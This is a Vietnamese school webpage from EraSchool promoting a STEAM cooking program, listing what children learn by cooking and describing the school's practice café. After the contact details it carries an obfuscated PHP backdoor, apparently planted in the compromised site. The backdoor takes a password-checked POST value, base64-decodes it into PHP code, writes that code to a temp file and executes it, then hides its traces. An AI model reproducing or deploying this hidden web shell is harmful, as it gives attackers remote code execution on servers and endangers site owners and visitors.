Dự án STEAM – kỹ năng nấu ăn

4/5 - (1 bình chọn)

Nếu được hỏi, trong các kỹ năng sinh tồn trẻ cần học kỹ năng nào trước tiên, từ góc độ của người làm giáo dục, có lẽ các thày cô tại EraSchool sẽ không ngần ngại chia sẻ quan điểm của mình: Đó chính là VÀO BẾP NẤU ĂN!

Trẻ sẽ học được điều gì nhỉ? 

Vào bếp nấu ăn, trẻ sẽ hiểu rằng: đây là một hoạt động cực kỳ thú vị mà bất kỳ ai cũng nên trải nghiệm hàng ngày. 

Vào bếp nấu ăn, trẻ sẽ nhanh chóng phân biệt được: Thức ăn khác với món ăn như thế nào?

Vào bếp nấu ăn, trẻ sẽ được rèn những kỹ năng tinh đòi hỏi độ khéo léo và cẩn thận cao, đặc biệt khi sử dụng dao hay kéo để sơ chế thức ăn sống và thái lát/ xắt miếng thức ăn chín.

Vào bếp nấu ăn, trẻ có cơ hội quan sát, học hỏi , cảm nhận về nhiệt độ, sự chuyển màu của thức ăn khi luộc, xào, nấu; phân biệt thức ăn còn sống, đã chín đủ độ hay bị quá lửa; phát triển giác quan khi trẻ học nếm để phân biệt các hương vị chua, cay, mặn, ngọt …

Vào bếp nấu ăn, trẻ sẽ được đóng vai một nhà toán học tài ba khi thao tác, cân, đong, đo gạo, nước, gia vị …

Vào bếp nấu ăn, trẻ sẽ trở thành một nhà hóa học mẫn cán khi nghiên cứu tỉ lệ giữa đường, bột, men, muối, nước … cho một công thức bánh quy, bánh ngọt hay bánh mỳ ….

Vào bếp nấu ăn, hơn thế nữa, trẻ có cơ hội trở thành những chuyên gia về dinh dưỡng và chăm sóc sức khỏe khi được ông bà, bố mẹ chia sẻ những kiến thức liên quan đến việc tìm hiểu về công dụng của các thực phẩm như hành, tỏi, tiêu, các loại rau gia vị, hoa quả trong thực đơn các bữa ăn hàng ngày.

Vào bếp nấu ăn, trẻ cũng có thể trở thành một  nghệ sỹ thị giác hoăc nghệ sỹ sắp đặt khi học trang trí, trình bày một món ăn.

Vào bếp nấu ăn, trẻ sẽ dần thấu hiểu được sự vất vả của cha, mẹ sau một ngày dài làm việc về nhà vẫn tiếp tục công việc nấu nướng cho các bữa ăn của cả nhà khi các con còn nhỏ, chưa giúp đỡ được bố mẹ.

Vào bếp nấu ăn, trẻ sẽ cảm nhận được rõ nét, bữa ăn ấm cúng bên những người thân yêu có giá trị gắn kết các thành viên trong gia đình như thế nào.

Day Tre Ky Nang Song Vao Bep Nau An

Có lẽ còn nhiều bài học thú vị khác nữa mà trẻ có thể lĩnh hội được khi tham gia nấu nướng cùng gia đình. Các thầy cô và phụ huynh cùng nối dài danh sách trên nhé.

Nghệ thuật ẩm thực cũng được lồng ghép vào các hoạt động trải nghiệm trong chương trình giáo dục STEAM tại EraSchool. Khu thực hành cuộc sống Coffe de Roses, sẽ là nơi học sinh được tham gia các hoạt động như pha chế đồ uống, làm bánh, làm mỳ, làm bánh phở, sấy cánh hoa làm trà và học các kỹ năng phục vụ …

Các thầy cô xin được bật mí một bí mật rất dễ thương: Làm phụ huynh của EraSchool có một đặc quyền, sẽ có những ngày đẹp trời trong năm học các bố mẹ sẽ trở thành những vị khách mời danh dự được phục vụ một số món ăn do chính các con học sinh Era vào bếp trổ tài.

Day Tre Ky Nang Song Cho Tre

Hãy trải nghiệm hành trình học tập hạnh phúc cùng các con nhé qua Video sau các phụ huynh nhé!

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}